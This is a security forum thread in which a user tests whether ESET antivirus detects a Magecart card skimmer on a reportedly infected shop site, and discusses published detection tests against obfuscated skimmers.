Jump to content

Web Site Magecart Attacks - Kudos to Eset Again!


Recommended Posts

Posted (edited)

First a recent reference article:

Credit Card Skimmer Found on Nine Sites, Researchers Ignored

Quote

Security researchers discovered a new batch of nine websites infected with malicious JavaScript that steals payment card info from online shoppers.

Some of them were infected a second time and the script persisted, despite efforts from the researchers to contact the website owners.

The script is attributed to MageCart Group 12, as per extensive analysis from RiskIQ a threat actor that is changing tactics as their tricks are being published in security reports.

https://www.bleepingcomputer.com/news/security/credit-card-skimmer-found-on-nine-sites-researchers-ignored/

So I decided to test Eset on detection capability. Per the linked article, picked one of the infected sites - Bahimi swimwear shop - first infected in November, 2019, the skimmer is still there today.

Attempted to order something here: https://bahimi.com/gbp/checkout/onepage/ .

Eset immediately detected the card skimmer:

Eset_Magacart.png

Edited by itman
  • Most Valued Members
Posted
23 minutes ago, itman said:

First a recent reference article:

Credit Card Skimmer Found on Nine Sites, Researchers Ignored

https://www.bleepingcomputer.com/news/security/credit-card-skimmer-found-on-nine-sites-researchers-ignored/

So I decided to test Eset on detection capability. Per the linked article, picked one of the infected sites - Bahimi swimwear shop - first infected in November, 2019, the skimmer is still there today.

Attempted to order something here: https://bahimi.com/gbp/checkout/onepage/ .

Eset immediately detected the card skimmer:

Eset_Magacart.png

Yes , it's a JS script loaded in the website

Posted (edited)

Also in fairness it should be noted that Eset might have issues with obfuscated JavaScript magecart attacks. I believe the web site I tested was not using an obfuscated JavaScript. -EDIT- Appears Eset needs to sandbox browser based JavaScript's and run them outside of the browser. As I understand it, browser scripts are not scanned by AMSI since they are run via the JavaScript .dll within the browser.

Eset failed the magecart simulator test for the the most recent Malware Research Group On-line Banking Protection certification: 

Quote

Simulator test results

The methodology behind these attacks was simple and similar: Injecting a malicious obfuscated JavaScript code into the website’s checkout pages and listening for an event,for example,when the user clicks on the “Pay” or “Place Order Now” or a similar button (event hijacking). When this event happens, the malicious code sends the credit card data to the attackers’ servers. In our test we simulated this attack. We implemented our obfuscated malicious JavaScript code based on the Newegg and British Airways cases and injecting it into a test webstore which was built by us. The code behavior and the obfuscation technique are exactly same as in the real-world examples: when the user fills out the credit card data and presses the “Place Order Now” button,the data is sent to our servers.

https://www.mrg-effitas.com/wp-content/uploads/2020/01/2019_Online_BankingQ4.pdf

Edited by itman
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...